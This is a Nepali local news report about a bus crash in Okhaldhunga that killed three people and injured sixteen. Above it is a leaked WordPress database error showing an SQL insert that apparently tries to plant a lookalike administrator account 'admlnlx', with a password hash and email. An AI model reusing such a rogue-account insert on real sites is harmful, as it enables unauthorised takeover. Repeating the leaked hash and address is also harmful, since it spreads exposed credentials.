WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7yppgjbLsNnFZnMBm1M77351/BDzr/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 01:04:41', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २५ असार, सोलुखुम्बु । काकट्टभिट्टाबाट सोलुखुम्बुका लागी छुटेको बस ओखलढुगांमा दुर्घटना हुदा ३ जनाको मृत्यु भएको छ ।
काकट्टभिट्टाबाट मगंलबार दिउँसो सोलुखुम्बुका लागी छुटेको मे १ ख १८९१ नम्बरको बस बुधबार विहान ४ बजे ओखलढुगांको मानेभन्ज्याङ गाउँपालिका ६ डडुवामा दुर्घटना हुदाँ ३ जनाको घटना स्थलमै मृत्यु भएको ओखलढुगां प्रहरीले जनाएको छ ।
दुर्घटनामा परी मृत्यु हुनेमा बस चालक झापाका कृष्ण बहादुर बस्नेत सोलुदुधकुण्ड नगरपालिका ५ कि माया थापा, सिन्धुली कमलामाई नगरपालिका १४ का लाल बहादुर धामी रहेका छन ।
दुर्घटनामा १६ जना घाईते भएका छन् । घाईते मध्ये ४ जनालाई उपचारका लागी काठमाण्डौ लगिएको छ । पुर्वबाट १९ जना यात्रु लिएर सोलुखुम्बुको सल्लेरी आउदै गरेको भाग्य रेखा यातयातको बस सडकबाट करिब २० मिटर तल झरेर भिरमा अड्किएको प्रहरीले जनाएको छ । घटनाको कृस्तृत विबरण आउन बाकी रहेको छ ।